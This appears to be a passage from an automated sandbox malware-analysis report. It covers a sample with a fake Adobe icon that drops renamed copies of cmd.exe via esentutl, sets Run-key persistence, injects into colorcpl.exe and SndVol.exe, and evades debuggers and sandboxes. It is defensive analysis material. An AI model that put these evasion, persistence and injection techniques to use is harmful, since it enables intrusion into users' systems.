Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029CCA37 push 029CCD72h; ret	0_2_029CCD6A
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_02A34A50 push eax; ret	0_2_02A34B20
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029CCBEC push 029CCD72h; ret	0_2_029CCD6A
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029D886C push 029D88AEh; ret	0_2_029D88A6
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029D6948 push 029D69F3h; ret	0_2_029D69EB
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029D6946 push 029D69F3h; ret	0_2_029D69EB
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029D2F60 push 029D2FD6h; ret	0_2_029D2FCE
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029ED2FC push 029ED367h; ret	0_2_029ED35F
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029C332C push eax; ret	0_2_029C3368
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029ED0AC push 029ED125h; ret	0_2_029ED11D
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_02A9F038 push eax; ret	0_2_02A9F056
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029D306C push 029D30B9h; ret	0_2_029D30B1
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029D306B push 029D30B9h; ret	0_2_029D30B1
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029ED1F8 push 029ED288h; ret	0_2_029ED280
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029DF108 push ecx; mov dword ptr [esp], edx	0_2_029DF10D
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029ED144 push 029ED1ECh; ret	0_2_029ED1E4
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029CD5A0 push 029CD5CCh; ret	0_2_029CD5C4
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029D790C push 029D7989h; ret	0_2_029D7981
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029D5E7C push ecx; mov dword ptr [esp], edx	0_2_029D5E7E

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\Libraries\Vjrsafyh.PIF	Jump to dropped file

Contains functionality to download and launch executables

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 8_2_027C6EEB ShellExecuteW,URLDownloadToFileW,

8_2_027C6EEB

Drops PE files

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\Libraries\Vjrsafyh.PIF	Jump to dropped file

Drops PE files to the user directory

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif			Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif			Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif			Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif			Jump to dropped file

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 8_2_027DAADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

8_2_027DAADB

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Vjrsafyh			Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Vjrsafyh			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Source: initial sample

Icon embedded in binary file: icon matches a legit application icon: adobe 12.png

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe

0_2_029DAB1C

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Delayed program exit found

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027CF7E2 Sleep,ExitProcess,	8_2_027CF7E2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027CF7E2 Sleep,ExitProcess,	11_2_027CF7E2
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0280F7E2 Sleep,ExitProcess,	13_2_0280F7E2

Contains functionality to enumerate running services

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,	8_2_027DA7D9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,	11_2_027DA7D9
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,	13_2_0281A7D9

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\colorcpl.exe	Window / User API: threadDelayed 5281			Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Window / User API: threadDelayed 4709			Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\SysWOW64\esentutl.exe

Dropped PE file which has not been started: C:\Users\Public\xpha.pif

Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Windows\SysWOW64\colorcpl.exe	API coverage: 9.8 %
Source: C:\Windows\SysWOW64\colorcpl.exe	API coverage: 6.2 %
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	API coverage: 9.8 %
Source: C:\Windows\SysWOW64\SndVol.exe	API coverage: 5.9 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\colorcpl.exe TID: 6508	Thread sleep count: 5281 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 6508	Thread sleep time: -15843000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 6508	Thread sleep count: 4709 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 6508	Thread sleep time: -14127000s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029C5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	0_2_029C5908
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027C928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	8_2_027C928E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027DC322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	8_2_027DC322
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027CC388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	8_2_027CC388
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027C96A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	8_2_027C96A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027CBB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	8_2_027CBB6B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027D9B86 FindFirstFileW,FindNextFileW,FindNextFileW,	8_2_027D9B86
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027C7877 FindFirstFileW,FindNextFileW,	8_2_027C7877
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027C8847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	8_2_027C8847
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_0280E8F9 FindFirstFileExA,	8_2_0280E8F9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027CBD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	8_2_027CBD72
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027C928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	11_2_027C928E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027DC322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	11_2_027DC322
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027CC388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	11_2_027CC388
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027C96A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	11_2_027C96A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027CBB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	11_2_027CBB6B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027D9B86 FindFirstFileW,FindNextFileW,FindNextFileW,	11_2_027D9B86
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027C7877 FindFirstFileW,FindNextFileW,	11_2_027C7877
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027C8847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	11_2_027C8847
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0280E8F9 FindFirstFileExA,	11_2_0280E8F9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027CBD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	11_2_027CBD72
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0280928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	13_2_0280928E
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0280C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	13_2_0280C388
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0281C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	13_2_0281C322
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_028096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	13_2_028096A0
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_02819B86 FindFirstFileW,FindNextFileW,FindNextFileW,	13_2_02819B86
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0280BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	13_2_0280BB6B
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0284E8F9 FindFirstFileExA,	13_2_0284E8F9
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_02808847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	13_2_02808847
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_02807877 FindFirstFileW,FindNextFileW,	13_2_02807877
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0280BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	13_2_0280BD72

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 8_2_027C7CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

8_2_027C7CD2

Source: D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.000000000071E000.00000004.00000020.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.000000000076D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: colorcpl.exe, 00000008.00000002.4491250282.0000000000540000.00000004.00000020.00020000.00000000.sdmp, Vjrsafyh.PIF, 0000000A.00000002.2240432486.00000000005FD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Vjrsafyh.PIF, 0000000C.00000002.2323126754.00000000005B5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlld

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\colorcpl.exe	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	API call chain: ExitProcess graph end node

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe

Code function: 0_2_029DF744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,

0_2_029DF744

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process queried: DebugPort	Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 8_2_027F4A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

8_2_027F4A8A

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe

Code function: 0_2_029D894C LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_029D894C

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_02A8A8E5 mov eax, dword ptr fs:[00000030h]	0_2_02A8A8E5
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_02803355 mov eax, dword ptr fs:[00000030h]	8_2_02803355
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_02803355 mov eax, dword ptr fs:[00000030h]	11_2_02803355
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_02843355 mov eax, dword ptr fs:[00000030h]	13_2_02843355

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 8_2_027D20B2 GetProcessHeap,HeapFree,

8_2_027D20B2

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027F503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_027F503C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027F4A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_027F4A8A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027FBB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_027FBB71
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 8_2_027F4BD8 SetUnhandledExceptionFilter,	8_2_027F4BD8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027F503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_027F503C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027F4A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_027F4A8A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027FBB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_027FBB71
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_027F4BD8 SetUnhandledExceptionFilter,	11_2_027F4BD8
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0283503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	13_2_0283503C
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_02834A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_02834A8A
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_02834BD8 SetUnhandledExceptionFilter,	13_2_02834BD8
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 13_2_0283BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_0283BB71

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process created / APC Queued / Resumed: C:\Windows\SysWOW64\SndVol.exe	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process created / APC Queued / Resumed: C:\Windows\SysWOW64\colorcpl.exe	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Process created / APC Queued / Resumed: C:\Windows\SysWOW64\colorcpl.exe	Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Memory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 27C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Memory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 27C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Memory allocated: C:\Windows\SysWOW64\SndVol.exe base: 2800000 protect: page execute and read and write	Jump to behavior

Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Source: C:\Windows\SysWOW64\esentutl.exe

File created: C:\Users\Public\alpha.pif

Jump to dropped file

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe

Thread APC queued: target process: C:\Windows\SysWOW64\colorcpl.exe

Jump to behavior

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe	8_2_027D2132
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe	11_2_027D2132
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe	13_2_02812132

Contains functionality to simulate mouse events

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 8_2_027D9662 mouse_event,

8_2_027D9662

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe	Jump to behavior

Source: colorcpl.exe, 00000008.00000002.4491250282.0000000000540000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: colorcpl.exe, 00000008.00000002.4491250282.0000000000540000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager+
Source: colorcpl.exe, 00000008.00000002.4491250282.0000000000540000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.4491250282.0000000000528000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe

Code function: 0_2_02A7C246 cpuid

0_2_02A7C246

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_029C5ACC
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: GetLocaleInfoA,	0_2_029CA7C4
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: GetLocaleInfoA,	0_2_029CA810
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_029C5BD8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoA,	8_2_027CF90C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,	8_2_02812393
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	8_2_028120B6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	8_2_0281201B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	8_2_02812143
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	8_2_02812690
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	8_2_02808484
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	8_2_028124BC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,	8_2_028125C3
